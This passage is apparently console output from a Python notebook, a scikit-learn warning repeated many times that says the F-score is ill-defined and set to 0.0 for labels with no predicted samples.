ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 